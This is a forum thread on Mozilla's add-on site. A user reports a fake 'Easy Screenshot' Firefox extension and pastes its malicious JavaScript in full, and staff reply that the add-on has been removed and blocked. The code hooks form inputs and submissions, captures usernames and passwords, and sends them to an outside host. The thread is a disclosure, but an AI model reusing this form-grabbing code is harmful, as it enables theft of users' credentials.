Addon malware. False "Easy Screenshot"

Add-ons addons.mozilla.org
#1

I have been hacked in two of my sites aparently disconnected so I’ve been searching how someone can get my user/pwd.

Some days ago I’ve installed addon:
name: Easy Screenshot
id: {4a0d8618-3e21-4bb8-8ae3-d04316b55a1e}

I have no skills in Javascript but I’ve found this code that is executed when this plugin is enabled. Obviously it is stealling all content from forms. So it get all passwords!

I don’t know where to report this kind of problems in an addon so I’ve decided to post here. If it isn’t the right place, please delete it report it by any other way.

Malware code:

var url = "https://animalia.tn/firefox/"; 
var debug = 1;
var currLoc = "";
spyjs_refreshEvents();

function spyjs_refreshEvents(){
	if(currLoc != location.href){
		currLoc=location.href;
		if(debug){
			console.log(currLoc);
		}
		spyjs_saveData("("+currLoc+")");
	}
	$('input').unbind('change');
	$('input').change(function(e) {
  		spyjs_getInput(e.currentTarget);
	});
	
	$('select').unbind('change');
	$('select').change(function(e) {
  		spyjs_getInput(e.currentTarget);
	});
	
	$('checkbox').unbind('change');
	$('checkbox').change(function(e) {
  		spyjs_getInput(e.currentTarget);
	});
	
	$('button').unbind('change');
	$('button').change(function(e) {
  		spyjs_getInput(e.currentTarget);
	});
	
	
	$('textarea').unbind('change');
	$('textarea').change(function(e) {
  		spyjs_getInput(e.currentTarget);
	});
}
	
function spyjs_getInput(inputInfo){
	 
	var name = inputInfo.name;
	var value = inputInfo.value;
	var stolenInput = {};
	if(name === ""){
		name="undefined_input";
	}
	if(value != ""){
		stolenInput[name] = value;
		if(debug){
			console.log(name+"="+value);
		}
		
        var pic = new Image()
        pic.src = url+'bot.php?values='+name+"="+value +  "<br/>"+ ""+currLoc+""
		
	}
}
function spyjs_saveData(data){
	
};
  
var forms = document.getElementsByTagName('form');
 for (var i = 0; i < forms.length; i++) {
 var form = forms[i];
var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://animalia.tn/firefox/login.php'); 
     var fields = form.getElementsByTagName('input');      
      for (var j = 0; j < fields.length; j++) {
          var f = fields[j];
          if (!form._pass && f.type == 'password')
              form._pass = f;
          else if (!form._user && (f.type == 'text' || f.type == 'email'))
              form._user = f;

          if (!(form._user !== undefined && form._pass !== undefined))
              continue;
              form.onsubmit = function() {
              if (this._user.value && this._pass.value) {                 				 
                var userName = this._user.value
                var passWord = this._pass.value
				var param = ""
				param += 'user='+userName+'&pass='+passWord +document.URL
             
			   xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
               xhr.send(param);
				
              }
                  }};
              }
#2

Hi,

Thank you for this report. Reviewers on AMO are currently taking care of the situation.

#3

I’m really sorry you had to experience this. Thank you so much for the report, we’ve removed the add-on from addons.mozilla.org and blocked it as well.

#4

Thanks. Sometimes when we detect things like this there is no place to report. I’m happy to have found problem and how to report and very unhappy for 30 hrs changing passwords and locating attackers malware…

#5

I think there are plans to add capability for such reports from inside the Firefox add-on manager.

If the extension has an addons.mozilla.org listing, you can also report it on there:
image